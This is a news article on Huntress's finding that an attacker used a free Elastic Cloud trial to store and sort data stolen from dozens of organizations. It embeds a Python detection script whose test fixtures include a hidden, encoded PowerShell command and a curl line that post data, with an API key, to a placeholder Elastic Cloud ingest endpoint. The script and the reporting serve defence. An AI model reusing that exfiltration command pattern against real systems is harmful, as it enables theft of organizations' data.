Huntress Uncovers Threat Actor Using Elastic Cloud Free Trial to Hoard Stolen Data
A hacker exploited enterprise software flaws and hijacked a free Elastic Cloud trial to triage stolen data from dozens of organizations before researchers shut it down.

A threat actor exploited vulnerabilities in widely used enterprise software and then routed stolen data into a free-trial instance of Elastic Cloud's security platform, using tools designed to defend organizations as the infrastructure for their own attacks. Security researchers at Huntress uncovered the campaign and say it marks the first time they have observed an adversary leverage Elastic Cloud for data exfiltration.
The attacker created the Elastic Cloud deployment on January 28, 2026, and used it for several days before the instance was taken offline following coordination between Huntress, Elastic, and law enforcement. During that window, telemetry showed the operator repeatedly interacting with the environment through the Kibana interface, logging hundreds of actions while examining incoming victim data.
The technique was notable for its simplicity and audacity. Rather than building custom infrastructure, the attacker ran an encoded PowerShell command containing a hardcoded API key and credentials to push stolen data directly into the free cloud instance. Once there, the data was organized within a "systeminfo index" that, as Huntress researchers discovered, contained details across not just one victim but an entire campaign. Infosecurity Magazine's Alessandro Mascellino reported the deployment was used to collect and analyze data from compromised systems across dozens of organizations.
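The ingest step described above (an encoded PowerShell command carrying an Elastic API key and pointing at a hosted deployment) is something endpoint telemetry can surface directly. The script below is an added detection example, not code from Huntress or Elastic: it decodes the base64/UTF-16LE payload behind `-EncodedCommand` (and its short forms such as `-enc`) in constructed process-creation log lines, then scores both the raw command line and the decoded script for an Elasticsearch API-key header, an Elastic Cloud style host, and bulk/document ingest paths. The log format, host names, deployment name, `.es.io` host suffix and the API key value are all assumptions or placeholders; it generalises slightly beyond the article by also flagging unencoded commands that hit the same indicators.

```python
"""Flag process command lines that push data to an Elasticsearch endpoint with a
hardcoded API key, including ones hidden behind PowerShell -EncodedCommand.
Added detection example; all log lines below are constructed, not real telemetry."""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional

# Indicator patterns for an Elasticsearch ingest target embedded in a command.
# The ".es.io" suffix is an assumption used here for Elastic Cloud hosted
# deployments; the header and paths are Elasticsearch's API-key auth and ingest APIs.
INDICATORS = {
    "elastic_api_key_header": re.compile(r"\bApiKey\s+[A-Za-z0-9+/=_-]{16,}", re.I),
    "elastic_cloud_host": re.compile(r"https?://[^\s'\"]+\.es\.io\b", re.I),
    "elastic_ingest_path": re.compile(r"/_bulk\b|/_doc\b", re.I),
    "web_request_cmdlet": re.compile(r"\bInvoke-(?:RestMethod|WebRequest)\b", re.I),
}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...);
# longest alternatives first so "-enc" is not split as "-e" + "nc".
_ENC_ALTS = "|".join("encodedcommand"[:n] for n in range(14, 0, -1))
ENCODED_FLAG = re.compile(rf"(?:^|\s)-(?:{_ENC_ALTS})\s+([A-Za-z0-9+/=]+)", re.I)

# Constructed log format: key=value pairs with a quoted cmdline, standing in for
# a Sysmon event 1 / Security 4688 process-creation record (assumption).
CMDLINE_FIELD = re.compile(r'cmdline="([^"]*)"')


@dataclass
class Finding:
    host: str
    severity: str            # "high", "medium" or "info"
    indicators: List[str]
    decoded: Optional[str]   # script recovered from -EncodedCommand, if any


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent/undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None  # malformed base64 or odd byte count: not a valid encoded command


def match_indicators(text: str) -> List[str]:
    return [name for name, pat in INDICATORS.items() if pat.search(text)]


def severity_for(indicators: List[str]) -> str:
    hits = set(indicators)
    if "elastic_api_key_header" in hits and hits & {"elastic_cloud_host", "elastic_ingest_path"}:
        return "high"    # credential and an Elasticsearch destination in the same command
    if hits:
        return "medium"
    return "info"        # encoded command with no Elastic indicators: worth a look, not an alert


def analyze_line(line: str) -> Optional[Finding]:
    m = CMDLINE_FIELD.search(line)
    if not m:
        return None
    cmdline = m.group(1)
    decoded = decode_encoded_command(cmdline)
    # Score the visible command line and the decoded payload together so an
    # unencoded curl/Invoke-RestMethod to the same endpoint is caught too.
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    indicators = match_indicators(text)
    if not indicators and decoded is None:
        return None  # ordinary command line with nothing of interest
    host_m = re.search(r"\bhost=(\S+)", line)
    return Finding(host=host_m.group(1) if host_m else "?",
                   severity=severity_for(indicators), indicators=indicators, decoded=decoded)


def scan(lines: List[str]) -> List[Finding]:
    return [f for f in (analyze_line(ln) for ln in lines) if f is not None]


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (base64 over UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample log lines. Host names, the deployment name and the API key
# are placeholders; $payload is deliberately left undefined in the fixture.
_BENIGN = "Get-Date; Get-Service | Where-Object Status -eq 'Running'"
_SUSPECT = ("Invoke-RestMethod -Method Post "
            "-Uri 'https://EXAMPLE-DEPLOYMENT.cloud.es.io/systeminfo/_bulk' "
            "-Headers @{Authorization='ApiKey PLACEHOLDER_KEY_0123456789abcdef'} -Body $payload")
SAMPLE_LOG = [
    f'ts=2026-01-29T03:14:07Z host=ws-01 image=powershell.exe cmdline="powershell.exe -NoP -enc {encode_powershell(_BENIGN)}"',
    f'ts=2026-01-29T03:15:22Z host=srv-02 image=powershell.exe cmdline="powershell.exe -NoP -w hidden -EncodedCommand {encode_powershell(_SUSPECT)}"',
    'ts=2026-01-29T03:16:05Z host=srv-03 image=curl.exe cmdline="curl.exe -X POST https://EXAMPLE-DEPLOYMENT.cloud.es.io/systeminfo/_doc"',
    'ts=2026-01-29T03:17:40Z host=ws-04 image=powershell.exe cmdline="powershell.exe -enc QUJD"',  # 3 bytes: not valid UTF-16
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f.severity.upper(), f.host, ",".join(f.indicators) or "-")
```

Running it on the fixture yields an `info` finding for the benign encoded command, a `high` finding for the encoded command that combines an API key with an Elastic host and `/_bulk`, and a `medium` finding for the plain `curl.exe` line; the malformed `-enc QUJD` line is dropped silently rather than crashing the scan. In production the `.es.io` pattern would be replaced by the tenant's own approved ingest endpoints, and anything outside that allow-list with an `ApiKey` header is the interesting case.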
Huntress had been tracking the campaign as part of a broader investigation into SolarWinds Web Help Desk vulnerabilities. The firm published this report as "Part 2" of that investigation, deliberately staging the disclosure to allow time for victim notification and multi-agency coordination. Researchers also noted a possible connection to opportunistic attacks against Microsoft SharePoint and other enterprise software, though that linkage was not fully confirmed.
The attacker's operational profile points to deliberate, if imperfect, efforts to obscure identity. Artifacts recovered from the investigation included accounts registered through the disposable email service quieresmail.com and firstmail.ltd, a Russian-registered temporary email network. The actor also routed activity through a SAFING_VPN tunnel. No specific threat group or nation-state attribution was made by Huntress.

What made the campaign particularly striking to the researchers was the inversion of purpose: a SIEM platform, whose entire function is to help security teams monitor, triage, and prioritize threats, was turned against the very organizations it is meant to protect. "While we have previously seen threat actors leveraging Velociraptor and other DFIR-focused tools for command and control, this was the first time we observed an adversary use Elastic Cloud for exfiltration," Huntress stated. "The attacker prepared their own Elastic Cloud free trial, using legitimate Elastic infrastructure, using it as a repository for stolen data across intrusions. They could then triage their victims and compromised endpoints, literally using SIEM technology."
The cloud instance has since been taken offline. "We have performed outreach and victim notification to organizations that we believe were indicated within the uncovered data, and we have coordinated with Elastic in a collaborative effort to further investigate and take down this threat actor infrastructure," Huntress said.
The campaign raises immediate questions about whether free-trial provisioning for powerful cloud security tools requires stronger identity verification or behavioral monitoring to detect abuse before stolen data can be organized and acted upon at scale.